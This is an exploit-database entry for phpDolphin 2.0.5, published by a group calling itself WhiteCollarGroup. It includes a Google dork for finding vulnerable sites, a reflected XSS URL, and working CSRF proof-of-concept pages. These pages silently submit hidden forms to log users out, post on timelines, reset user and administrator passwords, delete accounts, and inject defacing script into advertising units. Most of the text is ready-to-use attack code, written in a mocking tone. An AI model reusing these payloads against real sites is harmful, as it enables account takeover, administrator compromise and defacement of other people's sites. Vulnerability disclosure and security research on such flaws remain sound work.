phpDolphin 2.0.5 - Multiple Vulnerabilities

2016-01-15T00:00:00
ID 1337DAY-ID-24863
Type zdt
Reporter WhiteCollarGroup
Modified 2016-01-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: phpDolphin <= 2.0.5 CSRF
# Google Dork: intext:"Powered by phpDolphin"
# Date: January, 15th 2016
# Exploit Author: WhiteCollarGroup
# Vendor Homepage: http://phpdolphin.com
# Version: 2.0.5
 
XSS (Reflected)
===============
 
> http://target.com/index.php?a=search&q=teste&filter=m"><h1>XSS</h1><noscript>
CSRF
====
 
We've found no protection against CSRF (Cross-site Request Forgery), which made possible to do any kind of act on a user (or admin) account.
 
NO FORMS are secured at all. But we've included some interesting examples. These examples execute actions on the user account while he's visiting a special page prepared by us in any other server. He won't know anything while visiting, as nothing is shown. Let's start from the basic:
 
Logging an user off
------------------
 
```
<img src="http://localhost/dolphin/Script/index.php?a=feed&logout=1" width="1" height="1" />
```
 
It's good to remember that if the user kept the "remember me" on, there are cookies called "username" and (MD5-encoded) "password".
 
Posting on user's timeline
--------------------------
 
By changing the "group" input, it's also possible to post on groups.
 
```
Lorem ipsum dolor sit amet :)<br/>
Take a look on your profile ;)
<form method="post" action="http://localhost/dolphin/Script/requests/post_message.php" target="hiddenframe" id="hackfrm">
    <input type="hidden" name="message" value="HAXORED" />
    <input type="hidden" name="privacy" value="1" />
    <input type="hidden" name="group" value="" />
    <input type="hidden" name="value" value="" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```
 
Things can get a bit funnier.
 
Changing user password
----------------------
 
It's interesting that the change password form does NOT require the actual password. Just make sure "password" and "repeat_password" inputs have EXACTLY the same value.
 
```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=settings&b=security" target="hiddenframe" id="hackfrm">
    <input type="hidden" name="password" value="hacked1" />
    <input type="hidden" name="repeat_password" value="hacked1" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```
 
Funny enough? Not?
 
So let's change the administration password too. Of course this page must be accessed by the administrator.
 
```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=security" target="hiddenframe" id="hackfrm">
    <input type="hidden" name="password" value="hacked1" />
    <input type="hidden" name="repeat_password" value="hacked1" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```
 
In order to open the admin panel, just visit `/index.php?a=admin`.
 
Want to delete some user? Just find out the user ID (numeric). For that, just open the user profile, view source (Ctrl + U), find (Ctrl + F) "userid". You will find two attributes "data-userid". That's the numeric user ID.
 
```
<img src="http://localhost/dolphin/Script/index.php?a=admin&b=users&delete=USER_ID_HERE" width="0" height="0" />
```
 
Just want to mess everything up?
 
Hacking site index
==================
 
By adding Javascript code to one or more of the advertising units, we can block anyone's access to the site. This is our payload:
 
```
<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>
```
 
And this is our code:
 
```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=manage_ads&m=i" target="hiddenframe" id="hackfrm">
    <input type="hidden" name="ad1" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
    <input type="hidden" name="ad2" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
    <input type="hidden" name="ad3" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
    <input type="hidden" name="ad4" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
    <input type="hidden" name="ad5" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
    <input type="hidden" name="ad6" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```
 
Enough?
 
Simply all forms are vulnerable to CSRF. These were just some.

#  0day.today [2018-04-08]  #